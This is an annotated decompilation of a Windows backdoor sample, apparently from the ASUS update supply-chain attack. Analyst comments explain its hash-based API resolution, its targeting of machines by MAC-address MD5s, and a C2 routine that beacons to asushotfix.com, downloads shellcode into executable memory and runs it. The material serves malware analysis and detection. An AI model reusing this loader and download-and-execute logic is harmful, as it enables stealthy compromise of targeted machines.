Instrumentation[9]; struct _GUID ActivityId; void * SubProcessTag; void * PerflibData; void * EtwTraceData; void * WinSockData; ulong GdiBatchCount; union _union_7776 field_0xf74; ulong GuaranteedStackBytes; void * ReservedForPerf; void * ReservedForOle; ulong WaitingOnLoaderLock; void * SavedPriorityState; ulong ReservedForCodeCoverage; void * ThreadPoolData; void * * TlsExpansionSlots; ulong MuiGeneration; ulong IsImpersonating; void * NlsCache; void * pShimData; ushort HeapVirtualAffinity; ushort LowFragHeapDataSlot; void * CurrentTransactionHandle; struct _TEB_ACTIVE_FRAME * ActiveFrame; void * FlsData; void * PreferredLanguages; void * UserPrefLanguages; void * MergedPrefLanguages; ulong MuiImpersonation; union _union_7780 field_0xfc8; union _union_7781 field_0xfca; void * TxnScopeEnterCallback; void * TxnScopeExitCallback; void * TxnScopeContext; ulong LockCount; long WowTebOffset; void * ResourceRetValue; void * ReservedForWdf; ulonglong ReservedForCrt; struct _GUID EffectiveContainerId; }; struct _TEB_ACTIVE_FRAME_CONTEXT { ulong Flags; char * FrameName; }; struct _TEB_ACTIVE_FRAME { ulong Flags; struct _TEB_ACTIVE_FRAME * Previous; struct 
_TEB_ACTIVE_FRAME_CONTEXT * Context; }; // WARNING! conflicting data type names: /winapi_32/_EXCEPTION_REGISTRATION_RECORD - /ALL.h/_EXCEPTION_REGISTRATION_RECORD typedef WORD INTERNET_PORT; typedef union _union_140 _union_140, *P_union_140; typedef struct _EXCEPTION_RECORD _EXCEPTION_RECORD, *P_EXCEPTION_RECORD; typedef void * PVOID; typedef struct _CONTEXT _CONTEXT, *P_CONTEXT; typedef int (EXCEPTION_ROUTINE)(struct _EXCEPTION_RECORD *, PVOID, struct _CONTEXT *, PVOID); typedef EXCEPTION_ROUTINE * PEXCEPTION_ROUTINE; typedef struct _FLOATING_SAVE_AREA _FLOATING_SAVE_AREA, *P_FLOATING_SAVE_AREA; typedef struct _FLOATING_SAVE_AREA FLOATING_SAVE_AREA; struct _FLOATING_SAVE_AREA { DWORD ControlWord; DWORD StatusWord; DWORD TagWord; DWORD ErrorOffset; DWORD ErrorSelector; DWORD DataOffset; DWORD DataSelector; BYTE RegisterArea[80]; DWORD Cr0NpxState; }; struct _CONTEXT { DWORD ContextFlags; DWORD Dr0; DWORD Dr1; DWORD Dr2; DWORD Dr3; DWORD Dr6; DWORD Dr7; FLOATING_SAVE_AREA FloatSave; DWORD SegGs; DWORD SegFs; DWORD SegEs; DWORD SegDs; DWORD Edi; DWORD Esi; DWORD Ebx; DWORD Edx; DWORD Ecx; DWORD Eax; DWORD Ebp; DWORD Eip; DWORD SegCs; DWORD EFlags; DWORD Esp; DWORD SegSs; BYTE ExtendedRegisters[512]; }; union _union_140 { PEXCEPTION_ROUTINE Handler; PEXCEPTION_ROUTINE handler; }; struct _EXCEPTION_RECORD { DWORD ExceptionCode; DWORD ExceptionFlags; struct _EXCEPTION_RECORD * ExceptionRecord; PVOID ExceptionAddress; DWORD NumberParameters; ULONG_PTR ExceptionInformation[15]; }; typedef struct _IMAGE_EXPORT_DIRECTORY _IMAGE_EXPORT_DIRECTORY, *P_IMAGE_EXPORT_DIRECTORY; typedef struct _IMAGE_EXPORT_DIRECTORY IMAGE_EXPORT_DIRECTORY; struct _IMAGE_EXPORT_DIRECTORY { DWORD Characteristics; DWORD TimeDateStamp; WORD MajorVersion; WORD MinorVersion; DWORD Name; DWORD Base; DWORD NumberOfFunctions; DWORD NumberOfNames; DWORD AddressOfFunctions; DWORD AddressOfNames; DWORD AddressOfNameOrdinals; }; typedef union _union_137 _union_137, *P_union_137; union _union_137 { struct 
_EXCEPTION_REGISTRATION_RECORD * Next;
    struct _EXCEPTION_REGISTRATION_RECORD * prev;
};
typedef CHAR * LPSTR;
typedef struct URL_COMPONENTSA URL_COMPONENTSA, *PURL_COMPONENTSA;
typedef struct URL_COMPONENTSA URL_COMPONENTS;
typedef enum enum_2955 {
    INTERNET_SCHEME_DEFAULT=0,
    INTERNET_SCHEME_FILE=5,
    INTERNET_SCHEME_FIRST=12,
    INTERNET_SCHEME_FTP=1,
    INTERNET_SCHEME_GOPHER=2,
    INTERNET_SCHEME_HTTP=3,
    INTERNET_SCHEME_HTTPS=4,
    INTERNET_SCHEME_JAVASCRIPT=9,
    INTERNET_SCHEME_LAST=13,
    INTERNET_SCHEME_MAILTO=7,
    INTERNET_SCHEME_NEWS=6,
    INTERNET_SCHEME_PARTIAL=0,
    INTERNET_SCHEME_RES=11,
    INTERNET_SCHEME_SOCKS=8,
    INTERNET_SCHEME_UNKNOWN=1,
    INTERNET_SCHEME_VBSCRIPT=10
} enum_2955;
typedef enum enum_2955 INTERNET_SCHEME;
struct URL_COMPONENTSA {
    DWORD dwStructSize;
    LPSTR lpszScheme;
    DWORD dwSchemeLength;
    INTERNET_SCHEME nScheme;
    LPSTR lpszHostName;
    DWORD dwHostNameLength;
    INTERNET_PORT nPort;
    LPSTR lpszUserName;
    DWORD dwUserNameLength;
    LPSTR lpszPassword;
    DWORD dwPasswordLength;
    LPSTR lpszUrlPath;
    DWORD dwUrlPathLength;
    LPSTR lpszExtraInfo;
    DWORD dwExtraInfoLength;
};
// WARNING! conflicting data type names: /winapi_32/_NT_TIB - /ALL.h/_NT_TIB
typedef struct _NT_TIB NT_TIB;
typedef DWORD ULONG;
// WARNING! conflicting data type names: /winapi_32/_IMAGE_DATA_DIRECTORY - /ALL.h/_IMAGE_DATA_DIRECTORY
typedef union _union_143 _union_143, *P_union_143;
union _union_143 {
    PVOID FiberData;
    DWORD Version;
};
typedef struct astruct astruct, *Pastruct;
struct astruct {
};

/*
 * getAddrByHash - resolve an export of the module at `dllbase` by a hash of its name.
 *
 * This is the sample's API-hashing resolver: rather than carrying an import
 * table (or the export names themselves), it walks the module's export
 * directory, hashes every exported name and returns the virtual address of
 * the first export whose name hashes to `hash`, or 0 when none matches.
 *
 * Hash: 32-bit multiply-by-33 over the ASCII name, seeded with 0
 * (h = h * 0x21 + c for each byte up to the NUL). See `hash.c` for the
 * standalone implementation. Anyone re-implementing it should use unsigned
 * 32-bit arithmetic: the binary simply wraps, whereas `int` overflow in C is
 * undefined behaviour. `(int)c` sign-extends bytes >= 0x80 if `char` is
 * signed; export names are ASCII, so this does not change the result in
 * practice. `running_hash == hash` compares int to uint; the usual
 * conversions make this a bit-pattern equality, which is what is intended.
 *
 * Analyst notes:
 *  - The hash constants that feed this function (hashes[] in
 *    import_resolution) together with the 0x21 multiplier are a usable
 *    static indicator for this resolver.
 *  - Only the DLL names, never the function names, appear as string
 *    constants (see import_resolution), so string-based triage will not
 *    reveal which APIs are used; the hashes have to be brute-forced against
 *    the export lists of the named DLLs.
 *  - No special handling for forwarded exports or for an image without an
 *    export directory is visible here; the function trusts the PE headers of
 *    the module it was handed (the loader obtains these via LoadLibraryExW).
 *
 * All pointer arithmetic is done in `int`, i.e. this is 32-bit (x86) code.
 */
int getAddrByHash(IMAGE_DOS_HEADER *dllbase,uint hash)
{
    IMAGE_EXPORT_DIRECTORY *export_dir;
    char *name;
    int running_hash;
    int i;
    char c;

    // export_dir = image base + DataDirectory[0].VirtualAddress.
    // The decompiler typed `e_lfanew` as a pointer, but the arithmetic uses it
    // as a base-relative offset (it is added to the image base). 0x60 is the
    // offset of DataDirectory[0] (the export directory entry) inside
    // IMAGE_OPTIONAL_HEADER32, see struct _IMAGE_OPTIONAL_HEADER above.
    export_dir = (IMAGE_EXPORT_DIRECTORY *)
                 ((int)&dllbase->e_magic +
                  *(int *)((int)&dllbase->e_magic +
                           (int)((int)&dllbase->e_lfanew->OptionalHeader + 0x60)));
    i = 0;
    // iterate over all names in the export directory
    if (0 < (int)export_dir->NumberOfNames) {
        do {
            // name = base + AddressOfNames[i]  (AddressOfNames is an RVA array of
            // RVAs to the NUL-terminated export names)
            running_hash = 0;
            name = (char *)((int)&dllbase->e_magic +
                            *(int *)((int)&dllbase->e_magic + i * 4 + export_dir->AddressOfNames));
            c = *name;
            while (c != 0) {
                // multiply-by-33 hash, seeded with 0 (see `hash.c`)
                running_hash = running_hash * 0x21 + (int)c;
                name = name + 1;
                c = *name;
            }
            // match: return base + AddressOfFunctions[AddressOfNameOrdinals[i]]
            // (the ordinal table holds 16-bit indices into the 32-bit RVA table)
            if (running_hash == hash) {
                return (int)&dllbase->e_magic +
                       *(int *)((int)&dllbase->e_magic +
                                (uint)*(ushort *)((int)&dllbase->e_magic + i * 2 + export_dir->AddressOfNameOrdinals) * 4 +
                                export_dir->AddressOfFunctions);
            }
            i += 1;
        } while (i < (int)export_dir->NumberOfNames);
    }
    // no export name hashed to `hash`
    return 0;
}

// FUNCTION
//
// import_resolution - resolve the sample's imports by hash and store the
// resulting function pointers in `func_ptr_table`, starting at the
// VirtualAlloc slot.
//
// Five DLL names are assembled on the stack as UTF-16 literals (see the
// decoded names next to each array below). num_imports[] says how many of
// the 20 entries of hashes[] belong to each DLL, in order:
// 6 + 6 + 3 + 1 + 4 = 20, matching the 20 func_ptr_table_t slots from
// VirtualAlloc through InternetReadFile. The LoadLibraryExW slot is NOT
// resolved here: it must already have been filled in by the caller, because
// this function uses it to load each DLL. The four field_0x54..field_0x60
// slots after InternetReadFile are not written by this function either.
//
// Returns 1 when every hash resolved, or 0 on the first miss; in the latter
// case the table has only been filled up to the failing slot.
//
// Analyst notes:
//  - Each DLL is loaded by name through LoadLibraryExW with dwFlags = 8
//    (LOAD_WITH_ALTERED_SEARCH_PATH), so image-load telemetry shows these five
//    modules being loaded by the sample even though no import table references
//    them. Three of the names have no ".dll" suffix; the loader appends it.
//  - The 20 hash constants below are the most reliable static indicator for
//    this loader; they identify the API set without any readable API names.
undefined4 __cdecl import_resolution(func_ptr_table_t *func_ptr_table)
{
    IMAGE_DOS_HEADER *dllbase;
    int addr;
    int j;
    int *ptr;
    uint hashes [20];
    uint import_strings0 [7];
    uint import_strings2 [6];
    uint import_strings1 [4];
    uint import_dlls [5];
    uint import_string3 [5];
    uint import_string4 [4];
    uint num_imports [5];
    IMAGE_DOS_HEADER *dllBase;      // unused (decompiler artifact)
    int local_c;                    // running slot index into func_ptr_table / hashes[]
    int i;                          // hashes resolved from the current DLL so far

    // number of hashes to resolve from each DLL in import_dlls[] (same index)
    num_imports[0] = 6;
    num_imports[1] = 6;
    // each uint holds two UTF-16 code units, low half first: 0x6c0064 = "dl"
    import_strings1[1] = 0x6c0064;
    import_strings1[3] = 0x6c0064;
    import_strings2[1] = 0x6c0064;
    import_strings2[3] = 0x6c0064;
    // kernel32.dll string
    import_dlls[0] = (uint)import_strings0;
    // ntdll.dll
    import_dlls[1] = (uint)import_strings1;
    // ntdll.dll again (the MD5* exports live in ntdll; this keeps the
    // per-DLL counts aligned with the slot order of func_ptr_table_t)
    import_dlls[2] = (uint)import_strings2;
    // "IPHLPAPI" (no extension in the literal)
    import_dlls[3] = (uint)import_string3;
    // "wininet" (no extension in the literal)
    import_dlls[4] = (uint)import_string4;
    num_imports[2] = 3;
    num_imports[3] = 1;
    num_imports[4] = 4;
    // "kernel32.dll\0"
    import_strings0[0] = 0x65006b;
    import_strings0[1] = 0x6e0072;
    import_strings0[2] = 0x6c0065;
    import_strings0[3] = 0x320033;
    import_strings0[4] = 0x64002e;
    import_strings0[5] = 0x6c006c;
    import_strings0[6] = 0;
    // import_strings1 = "ntdll.dl" — no terminator within its own 4 elements.
    // NOTE(review): the decompiler may have split one stack buffer into
    // import_strings1/import_strings2; confirm against the stack frame before
    // relying on this string being well-formed.
    import_strings1[0] = 0x74006e;
    import_strings1[2] = 0x2e006c;
    // import_strings2 = "ntdll.dll\0"
    import_strings2[0] = 0x74006e;
    import_strings2[2] = 0x2e006c;
    import_strings2[4] = 0x6c;
    import_strings2[5] = 0;
    // "IPHLPAPI\0"
    import_string3[0] = 0x500049;
    import_string3[1] = 0x4c0048;
    import_string3[2] = 0x410050;
    import_string3[3] = 0x490050;
    import_string3[4] = 0;
    // "wininet\0"
    import_string4[0] = 0x690077;
    import_string4[1] = 0x69006e;
    import_string4[2] = 0x65006e;
    import_string4[3] = 0x74;
    // The hashes define the following functions (in that order), i.e. the
    // func_ptr_table_t slots from VirtualAlloc onwards. Note that
    // func_ptr_table_t types swprintf as (char *, char *, ...); the signature
    // listed here differs from the struct.
    //
    //
    // LPVOID (* VirtualAlloc)(LPVOID, SIZE_T, DWORD, DWORD);
    // DWORD (* GetModuleFileNameW)(HMODULE, LPWSTR, DWORD);
    // WINBOOL (* WritePrivateProfileStringW)(LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR);
    // void (* GetSystemTimeAsFileTime)(LPFILETIME);
    // WINBOOL (* FileTimeToSystemTime)(FILETIME *, LPSYSTEMTIME);
    // WINBOOL (* VirtualFree)(LPVOID, SIZE_T, DWORD);
    // void * (* memcpy)(void *, void *, size_t);
    // int (* memcmp)(void *, void *, size_t);
    // void * (* memset)(void *, int, size_t);
    // int (* swprintf)(wchar_t *, size_t, wchar_t *, ...);
    // int (* sprintf)(char *, char *, ...);
    // char * (* strncat)(char *, char *, size_t);
    // int MD5Init;
    // int MD5Update;
    // int MD5Final;
    // int GetAdaptersAddresses;
    // HINTERNET (* InternetOpenA)(LPCSTR, DWORD, LPCSTR, LPCSTR, DWORD);
    // HINTERNET (* InternetOpenUrlA)(HINTERNET, LPCSTR, LPCSTR, DWORD, DWORD, DWORD_PTR);
    // WINBOOL (* InternetQueryDataAvailable)(HINTERNET, LPDWORD, DWORD, DWORD_PTR);
    // WINBOOL (* InternetReadFile)(HINTERNET, LPVOID, DWORD, LPDWORD);
    //
    hashes[0] = 0xdf894b12;
    hashes[1] = 0xb5114d1e;
    hashes[2] = 0xe06c4b85;
    hashes[3] = 0x1a6f40d7;
    hashes[4] = 0x79ea1906;
    hashes[5] = 0x7b260749;
    hashes[6] = 0x5a370cb;
    hashes[7] = 0x5a3705f;
    hashes[8] = 0x5a3b36b;
    hashes[9] = 0xf77105bd;
    hashes[10] = 0xa1f571a6;
    hashes[11] = 0xab4ca0df;
    hashes[12] = 0xc9cc0d1a;
    hashes[13] = 0x8922d4c9;
    hashes[14] = 0x314bc30;
    hashes[15] = 0x9acb1212;
    hashes[16] = 0x87b21b7c;
    hashes[17] = 0xd19124af;
    hashes[18] = 0xe8baa2fa;
    hashes[19] = 0x3d840fa5;
    local_c = 0;
    // `j` is a byte offset (0, 4, ..., 0x10) used to index both import_dlls[]
    // and num_imports[] as 4-byte elements; 0x14 is sizeof(import_dlls).
    j = 0;
    do {
        // load the DLL by name; dwFlags 8 = LOAD_WITH_ALTERED_SEARCH_PATH
        dllbase = (IMAGE_DOS_HEADER *) (*func_ptr_table->LoadLibraryExW)(*(LPCWSTR *)((int)import_dlls + j),NULL,8);
        i = 0;
        if (0 < *(int *)((int)num_imports + j)) {
            // next free slot of the table, viewed as an array of 32-bit pointers
            ptr = (int *)(&func_ptr_table->VirtualAlloc + local_c);
            do {
                // Decompiler artifact: `register0x00000010` is Ghidra's name for
                // ESP, which it could not eliminate. Since ptr - &VirtualAlloc is
                // exactly local_c slots, the operand reduces to
                // ESP - 0xfc + 4 * local_c, i.e. almost certainly hashes[local_c]
                // (hashes[] sitting at ESP-0xfc) — confirm in the disassembly.
                addr = getAddrByHash(dllbase,*(uint *)((int)register0x00000010 + (-0xfc - (int)&func_ptr_table->VirtualAlloc) + (int)ptr));
                *ptr = addr;
                if (addr == 0) {
                    // unresolved hash: give up, leaving the table partially filled
                    return 0;
                }
                local_c += 1;
                ptr = ptr + 1;
                i += 1;
            } while (i < *(int *)((int)num_imports + j));
        }
        j += 4;
    } while (j < 0x14);
    return 1;
}

// Query `GetAdaptersAddresses` and, depending on the `only_check_count`
// parameter, only return the number of adapters or also write the MD5 sums of
// the MAC addresses into `buffer`.
int md5_mac(void *buffer,int only_check_count,func_ptr_table_t *func_ptrs) { ULONG ret; LPVOID alloced_buffer; int ret2; uint md5_ctx_ish [27]; int num_adapters; void *buffer_ptr; SIZE_T size; size = 0; ret = (*(code *)func_ptrs->GetAdaptersAddresses)(0,0,0,0,&size); if (ret == ERROR_BUFFER_OVERFLOW) { alloced_buffer = (*func_ptrs->VirtualAlloc)(NULL,size,MEM_COMMIT,PAGE_READWRITE); ret2 = (*(code *)func_ptrs->GetAdaptersAddresses)(0,0,0,alloced_buffer,&size); if ((ret2 == 0) && (num_adapters = 0, alloced_buffer != NULL)) { buffer_ptr = buffer; do { if (*(int *)((int)alloced_buffer + 0x34) != 0) { if (only_check_count == 0) { (*(code *)func_ptrs->MD5Init)(md5_ctx_ish); (*(code *)func_ptrs->MD5Update)(md5_ctx_ish,(int)alloced_buffer + 0x2c,6); (*(code *)func_ptrs->MD5Final)(md5_ctx_ish); (*func_ptrs->memcpy)(buffer_ptr,md5_ctx_ish + 0x16,0x10); } num_adapters += 1; buffer_ptr = (void *)((int)buffer_ptr + 0x14); } alloced_buffer = *(LPVOID *)((int)alloced_buffer + 8); } while (alloced_buffer != NULL); } } else { num_adapters = 0; } return num_adapters; } // WARNING: Could not reconcile some variable overlaps void C2(mac_md5_list_entry_t *md5s_of_thismachine,func_ptr_table_t *func_ptrs) { uint *__src; HINTERNET hInternet; HINTERNET hFile; uint *buffer; char *__dest; char beacon_str [64]; int url [9]; uint hex_str [3]; DWORD num_bytes_read; uint i; uint fmt_str [2]; undefined2 question_mark_str [2]; DWORD num_bytes_available; byte b; // SimpleStackStrings.py: ?https://asushotfix.com/logo2.jpg question_mark_str[0] = 0x3f; // SimpleStackStrings.py: https://asushotfix.com/logo2.jpg url[0] = 0x70747468; url[1] = 0x2f2f3a73; url[2] = 0x73757361; url[3] = 0x66746f68; url[4] = 0x632e7869; url[5] = 0x6c2f6d6f; url[6] = 0x326f676f; url[7] = 0x67706a2e; url[8] = 0; (*func_ptrs->memset)(beacon_str,0,0x40); // SimpleStackStrings.py: %02X fmt_str[0] = 0x58323025; fmt_str[1]._0_1_ = 0; i = 0; __dest = beacon_str; do { (*func_ptrs->memset)(hex_str,0,0xc); b = *(byte 
*)((int)md5s_of_thismachine->md5mac1 + i); if (b < 0x80) { (*func_ptrs->sprintf)((char *)hex_str,(char *)fmt_str,(int)(char)b); __src = hex_str; } else { (*func_ptrs->sprintf)((char *)hex_str,(char *)fmt_str); __src = (uint *)((int)hex_str + 6); } (*func_ptrs->memcpy)(__dest,__src,3); i += 1; __dest = __dest + 2; } while (i < 0x10); (*func_ptrs->strncat)((char *)url,(char *)question_mark_str,2); (*func_ptrs->strncat)((char *)url,beacon_str,0x40); hInternet = (*func_ptrs->InternetOpenA)(NULL,0,NULL,NULL,0); if (hInternet != NULL) { hFile = (*func_ptrs->InternetOpenUrlA)(hInternet,(LPCSTR)url,NULL,0,0x84800100,0); if (hFile != NULL) { // allocate a buffer to download shellcode into buffer = (uint *)(*func_ptrs->VirtualAlloc)(NULL,0x500000,MEM_COMMIT,PAGE_EXECUTE_READWRITE); while( true ) { num_bytes_available = 0; (*func_ptrs->InternetQueryDataAvailable)(hFile,&num_bytes_available,0,0); if (num_bytes_available == 0) break; // download shellcode (*func_ptrs->InternetReadFile) (hFile,(LPVOID)(*buffer + 8 + (int)buffer),num_bytes_available,&num_bytes_read); *buffer = *buffer; buffer[1] = buffer[1]; } // execute the downloaded shellcode (*(code *)(buffer + 2))(); if (buffer != NULL) { (*func_ptrs->VirtualFree)(buffer,0x500000,0x4000); } } } return; } // Compare the MD5s in `buffer` with the ones in `md5s_of_macs` if they match copy the MD5s to // `md5s_of_thismachine` then return none zero // in case they don't match return 0 int cmp_md5(func_ptr_table_t *func_ptrs,int *md5s_of_macs,void *buffer,uint cnt, mac_md5_list_entry_t *md5s_of_thismachine) { int iVar1; int iVar2; uint uVar3; int *piVar4; uint uVar5; void *__s2; int *piVar6; bool bVar7; int local_68; undefined local_64 [40]; int local_3c; undefined local_38 [20]; undefined local_24 [20]; int local_10; uint local_c; int *local_8; uVar3 = 0; local_8 = md5s_of_macs; iVar2 = 0; do { local_10 = *local_8; if (local_10 == 1) { iVar2 = 0xb; piVar4 = local_8; piVar6 = &local_68; while (iVar2 != 0) { iVar2 += -1; *piVar6 = 
*piVar4; piVar4 = piVar4 + 1; piVar6 = piVar6 + 1; } iVar2 = 0; local_c = 0; __s2 = buffer; if (cnt != 0) { do { iVar1 = (*func_ptrs->memcmp)(local_64,__s2,0x10); if (iVar1 == 0) { iVar2 = 1; break; } local_c += 1; __s2 = (void *)((int)__s2 + 0x14); } while (local_c < cnt); } if (iVar2 != 0) goto LAB_00000630; } bVar7 = local_10 == 2; local_10 = iVar2; if (bVar7) { local_10 = 0; local_c = 0; iVar2 = 0xb; piVar4 = local_8; piVar6 = &local_3c; while (iVar2 != 0) { iVar2 += -1; *piVar6 = *piVar4; piVar4 = piVar4 + 1; piVar6 = piVar6 + 1; } uVar5 = 0; __s2 = buffer; if (cnt != 0) { do { iVar2 = (*func_ptrs->memcmp)(local_38,__s2,0x10); if (iVar2 == 0) { local_c = 1; break; } uVar5 += 1; __s2 = (void *)((int)__s2 + 0x14); } while (uVar5 < cnt); } uVar5 = 0; __s2 = buffer; if (cnt != 0) { do { iVar2 = (*func_ptrs->memcmp)(local_24,__s2,0x10); if (iVar2 == 0) { if (local_c == 1) { local_10 = 1; } break; } uVar5 += 1; __s2 = (void *)((int)__s2 + 0x14); } while (uVar5 < cnt); } iVar2 = local_10; if (local_10 != 0) { LAB_00000630: (*func_ptrs->memcpy)(md5s_of_thismachine,md5s_of_macs + uVar3 * 0xb,0x2c); return iVar2; } } local_8 = local_8 + 0xb; uVar3 += 1; iVar2 = local_10; if (0x11 < uVar3) { return local_10; } } while( true ); } // WARNING: Variable defined which should be unmapped: lpSystemTimeAsFileTime void no_match(func_ptr_table_t *func_ptrs,int ebx,int edi) { DWORD len; undefined *puVar2; size_t __n; longlong lVar3; LPFILETIME lpSystemTimeAsFileTime; LPWSTR lpFilename; WCHAR module_filename [260]; WCHAR filename [260]; WCHAR string [20]; _SYSTEMTIME sytemtime; WCHAR fmt_str [14]; WCHAR keyname2 [8]; WCHAR idx_ini__string [8]; WCHAR keyname1 [8]; WCHAR keyname3 [8]; WCHAR appname [8]; uint _Stack28; WCHAR *puStack24; uint FStack16; uint len_1; int i; idx_ini__string[0] = L'i'; idx_ini__string[1] = L'd'; idx_ini__string[2] = L'x'; idx_ini__string[3] = L'.'; idx_ini__string[4] = L'i'; idx_ini__string[5] = L'n'; idx_ini__string[6] = L'i'; idx_ini__string[7] = L'\0'; i 
= 0; (*func_ptrs->memset)(module_filename,0,0x104); (*func_ptrs->memset)(filename,0,0x104); len = (*func_ptrs->GetModuleFileNameW)(NULL,module_filename,0x104); if ((len != 0) && (len_1 = len - 1, -1 < (int)len_1)) { __n = len + 1 + len_1; puStack24 = (WCHAR *)&stack0xfffffb2a; do { if ((*(short *)((int)puStack24 + __n) == 0x5c) && (i += 1, i == 3)) { (*func_ptrs->memcpy)(filename,module_filename,__n); (*func_ptrs->memcpy)((void *)((int)filename + __n),idx_ini__string,0xe); } len_1 -= 1; __n -= 2; } while (-1 < (int)len_1); } if (filename[0] != L'\0') { (*func_ptrs->memset)(&sytemtime,0,0x10); (*func_ptrs->GetSystemTimeAsFileTime)((LPFILETIME)&_Stack28); FUN_00005460(_Stack28 + 0x2ac18000,(int)puStack24 + (uint)(0xd53e7fff < _Stack28) + 0xfe624e21, 10000000,0,(LPFILETIME)&_Stack28,0,module_filename,0x104,edi,ebx); // here a function with just a `ret` opcode in it is called ... the question is why? just_a_return_but_why(); (*func_ptrs->FileTimeToSystemTime)((FILETIME *)&FStack16,(LPSYSTEMTIME)&sytemtime); (*func_ptrs->swprintf)((char *)string,(char *)fmt_str); // here the some stuff is written into `idx.ini` (*func_ptrs->WritePrivateProfileStringW)(appname,keyname1,string,filename); (*func_ptrs->WritePrivateProfileStringW)(appname,keyname2,string,filename); (*func_ptrs->WritePrivateProfileStringW)(appname,keyname3,string,filename); } return; } // WARNING: Could not reconcile some variable overlaps void payload(func_ptr_table_t *func_ptrs) { int mac_cnt; LPVOID buffer; uint mac_cnt2; int matched; SIZE_T dwSize; mac_md5_list_entry_t md5s_of_thismachine; mac_md5_list_entry_t md5s_of_macs [18]; // fill the structure with MD5s of target MACs md5s_of_macs[0].md5mac1[0] = 0xc706b000; md5s_of_macs[0].md5mac1[1] = 0xe6acb6da; md5s_of_macs[0].md5mac1[2] = 0x99375cc2; md5s_of_macs[0].md5mac1[3] = 0x146e2beb; md5s_of_macs[0].count = 2; md5s_of_macs[0].padding1 = 0; md5s_of_macs[0].md5mac2[0] = 0xa3ba7759; md5s_of_macs[0].md5mac2[1] = 0xa10ccef8; md5s_of_macs[0].md5mac2[2] = 
0xc96a6dc9; md5s_of_macs[0].md5mac2[3] = 0x919a0ca4; md5s_of_macs[0].padding2 = 0; md5s_of_macs[1].count = 1; md5s_of_macs[1].md5mac1[0] = 0xc706b000; md5s_of_macs[1].md5mac1[1] = 0xe6acb6da; md5s_of_macs[1].md5mac1[2] = 0x99375cc2; md5s_of_macs[1].md5mac1[3] = 0x146e2beb; md5s_of_macs[1].padding1 = 0; md5s_of_macs[1].md5mac2[0]._0_1_ = 0; md5s_of_macs[1].md5mac2._1_4_ = 0; md5s_of_macs[1].md5mac2._5_4_ = 0; md5s_of_macs[1].md5mac2._9_4_ = 0; md5s_of_macs[1]._37_4_ = 0; md5s_of_macs[1].padding2._1_2_ = 0; md5s_of_macs[1].padding2[3] = 0; md5s_of_macs[2].count = 1; md5s_of_macs[2].md5mac1[0] = 0xeb8e9d40; md5s_of_macs[2].md5mac1[1] = 0xe54685ce; md5s_of_macs[2].md5mac1[2] = 0x40d70a6a; md5s_of_macs[2].md5mac1[3] = 0xbdad7a66; md5s_of_macs[2].padding1 = 0; md5s_of_macs[2].md5mac2[0]._0_1_ = 0; md5s_of_macs[2].md5mac2._1_4_ = 0; md5s_of_macs[2].md5mac2._5_4_ = 0; md5s_of_macs[2].md5mac2._9_4_ = 0; md5s_of_macs[2]._37_4_ = 0; md5s_of_macs[2].padding2._1_2_ = 0; md5s_of_macs[2].padding2[3] = 0; md5s_of_macs[3].count = 1; md5s_of_macs[3].md5mac1[0] = 0xd32da47d; md5s_of_macs[3].md5mac1[1] = 0xe1d47445; md5s_of_macs[3].md5mac1[2] = 0x700eeaa7; md5s_of_macs[3].md5mac1[3] = 0xa6c97b8e; md5s_of_macs[3].padding1 = 0; md5s_of_macs[3].md5mac2[0]._0_1_ = 0; md5s_of_macs[3].md5mac2._1_4_ = 0; md5s_of_macs[3].md5mac2._5_4_ = 0; md5s_of_macs[3].md5mac2._9_4_ = 0; md5s_of_macs[3]._37_4_ = 0; md5s_of_macs[3].padding2._1_2_ = 0; md5s_of_macs[3].padding2[3] = 0; md5s_of_macs[4].count = 2; md5s_of_macs[4].md5mac1[0] = 0x252ae6ad; md5s_of_macs[4].md5mac1[1] = 0x8411df7a; md5s_of_macs[4].md5mac1[2] = 0x91b2c518; md5s_of_macs[4].md5mac1[3] = 0x3e546732; md5s_of_macs[4].padding1 = 0; md5s_of_macs[4].md5mac2[0] = 0xd6ae6842; md5s_of_macs[4].md5mac2[1] = 0xf2ffa54a; md5s_of_macs[4].md5mac2[2]._0_1_ = 2; md5s_of_macs[4].md5mac2._9_4_ = 0x7947240d; md5s_of_macs[4].md5mac2[3]._1_2_ = 0x7d0d; md5s_of_macs[4].md5mac2[3]._3_1_ = 0x32; md5s_of_macs[4].padding2 = 0; md5s_of_macs[5].count = 1; 
md5s_of_macs[5].md5mac1[0] = 0x3fc5147b; md5s_of_macs[5].md5mac1[1] = 0xc14c60d3; md5s_of_macs[5].md5mac1[2] = 0xf45acaeb; md5s_of_macs[5].md5mac1[3] = 0xd5fe5a41; md5s_of_macs[5].padding1 = 0; md5s_of_macs[5].md5mac2[0]._0_1_ = 0; md5s_of_macs[5].md5mac2._1_4_ = 0; md5s_of_macs[5].md5mac2._5_4_ = 0; md5s_of_macs[5].md5mac2._9_4_ = 0; md5s_of_macs[5]._37_4_ = 0; md5s_of_macs[5].padding2._1_2_ = 0; md5s_of_macs[5].padding2[3] = 0; md5s_of_macs[6].count = 1; md5s_of_macs[6].md5mac1[0] = 0x2ea68e3a; md5s_of_macs[6].md5mac1[1] = 0xbeecb432; md5s_of_macs[6].md5mac1[2] = 0xa50df33; md5s_of_macs[6].md5mac1[3] = 0x73c8eb28; md5s_of_macs[6].padding1 = 0; md5s_of_macs[6].md5mac2[0]._0_1_ = 0; md5s_of_macs[6].md5mac2._1_4_ = 0; md5s_of_macs[6].md5mac2._5_4_ = 0; md5s_of_macs[6].md5mac2._9_4_ = 0; md5s_of_macs[6]._37_4_ = 0; md5s_of_macs[6].padding2._1_2_ = 0; md5s_of_macs[6].padding2[3] = 0; md5s_of_macs[7].count = 1; md5s_of_macs[7].md5mac1[0] = 0x6c9516cc; md5s_of_macs[7].md5mac1[1] = 0x2bcd0695; md5s_of_macs[7].md5mac1[2] = 0xd7a789b3; md5s_of_macs[7].md5mac1[3] = 0xbd3324da; md5s_of_macs[7].padding1 = 0; md5s_of_macs[7].md5mac2[0]._0_1_ = 0; md5s_of_macs[7].md5mac2._1_4_ = 0; md5s_of_macs[7].md5mac2._5_4_ = 0; md5s_of_macs[7].md5mac2._9_4_ = 0; md5s_of_macs[7]._37_4_ = 0; md5s_of_macs[7].padding2._1_2_ = 0; md5s_of_macs[7].padding2[3] = 0; md5s_of_macs[8].count = 2; md5s_of_macs[8].md5mac1[0] = 0x64cc4cfe; md5s_of_macs[8].md5mac1[1] = 0xa6539215; md5s_of_macs[8].md5mac1[2]._0_1_ = 1; md5s_of_macs[8].md5mac1._9_4_ = 0x71f10493; md5s_of_macs[8].md5mac1[3]._2_2_ = 0x6d88; md5s_of_macs[8].padding1 